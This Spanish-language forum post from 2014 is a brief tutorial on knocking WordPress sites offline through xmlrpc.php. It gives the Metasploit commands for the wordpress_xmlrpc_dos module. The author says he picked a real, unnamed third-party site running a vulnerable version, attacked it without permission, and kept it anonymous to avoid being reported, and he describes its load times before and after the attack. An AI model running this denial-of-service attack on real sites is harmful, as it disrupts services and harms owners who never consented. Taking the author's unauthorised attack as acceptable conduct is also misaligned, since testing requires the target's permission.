send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

DoS en Wordpress con xmlrpc.php

  • 0 Respuestas
  • 2874 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu
« en: Septiembre 09, 2014, 03:26:33 pm »
Que hay chicos les traigo este peque tuto

xmlrpc.php para que sirve?

Xmlrpc.php es el encargado de permitirnos postear remotamente a través de Microsoft Word, Textmate, Thunderbird, smartphones, entre otros clientes. Todo ello a través del protocolo XML-RPC.


Además será quien se encargue de recibir los pingbacks (enlaces de otros blogs hacía alguno de nuestros artículos) y enviar los trackbacks (enlaces de nuestro blog hacía artículos de otro blog).

Bueno ya la vulne de xmlrpc me la tope hace mucho tiempo (You are not allowed to view links. Register or Login)
este archivo se usa para realizar un poderoso ataque Dos, en donde el amigo metasploit ya hizo su trabajo :D

Código: You are not allowed to view links. Register or Login
msf > use auxiliary/dos/http/wordpress_xmlrpc_dos     
msf auxiliary(wordpress_xmlrpc_dos) > show actions           
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION <action-name>     
msf auxiliary(wordpress_xmlrpc_dos) > show options           
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run

Yo busque un website con wp versiones vulnerables: 3.5 - 3.9.2



No muestro el website para demostrar algo de etica (na mentira para que no denuncien jajaj)

Despues de completar el rhost y targeturi le damos a run



y con esto estaremos empezando el dos, el website cae a ratos, pero veamos un test
de velocidad de carga antes y despues:

Antes:



Con el dos activo:





Saludos !
« Última modificación: Junio 07, 2015, 07:46:44 pm por EPSILON »

 

¿Te gustó el post? COMPARTILO!



Herramienta de test de penetración para WordPress o Joomla!

Iniciado por graphixx

Respuestas: 0
Vistas: 1956
Último mensaje Octubre 16, 2015, 07:24:41 am
por graphixx
Brute Force en paneles de administración WordPress con WPScan

Iniciado por BrowserNet

Respuestas: 2
Vistas: 1802
Último mensaje Junio 01, 2016, 01:31:11 am
por BrowserNet
Como subir shell en Wordpress

Iniciado por AΞRCRΞA

Respuestas: 1
Vistas: 3555
Último mensaje Noviembre 13, 2013, 03:14:53 am
por alexander1712
Cómo encontrar Malware en su web de WordPress

Iniciado por morodog

Respuestas: 0
Vistas: 1474
Último mensaje Marzo 11, 2015, 05:27:43 am
por morodog
Securizar el acceso a wp-admin de WordPress

Iniciado por BlackDead

Respuestas: 1
Vistas: 1510
Último mensaje Agosto 07, 2013, 01:19:51 am
por ZanGetsu